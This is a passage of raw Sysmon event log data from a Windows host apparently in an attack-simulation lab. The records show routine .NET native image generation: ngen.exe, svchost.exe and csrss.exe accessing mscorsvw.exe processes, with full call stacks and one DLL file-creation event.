13:21:50.039{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456E-6000-ED01-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:51.148{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456F-6000-F001-000000009A01}4464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:51.148{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-456F-6000-F001-000000009A01}4464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:51.148{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456F-6000-F001-000000009A01}4464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:51.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-456F-6000-EF01-000000009A01}2736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:51.039{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-456F-6000-EF01-000000009A01}2736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:51.039{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-456F-6000-EF01-000000009A01}2736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:52.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4570-6000-F201-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:52.852{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4570-6000-F201-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:52.852{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4570-6000-F201-000000009A01}1636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:52.789{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4570-6000-F101-000000009A01}2032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:52.774{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4570-6000-F101-000000009A01}2032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:52.774{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4570-6000-F101-000000009A01}2032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:52.695{08A6967A-456F-6000-F001-000000009A01}4464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1170-0\Microsoft.VisualBasic.Compatibility.dll2021-01-14 13:21:52.695 10341000x80000000000000006125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.945{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-FF01-000000009A01}744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.930{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4571-6000-FF01-000000009A01}744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.930{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-FF01-000000009A01}744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.867{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-FE01-000000009A01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.852{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4571-6000-FE01-000000009A01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.852{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-FE01-000000009A01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.805{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-FD01-000000009A01}2280C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.805{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4571-6000-FD01-000000009A01}2280C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.805{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-FD01-000000009A01}2280C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.774{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-FC01-000000009A01}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.758{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4571-6000-FC01-000000009A01}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 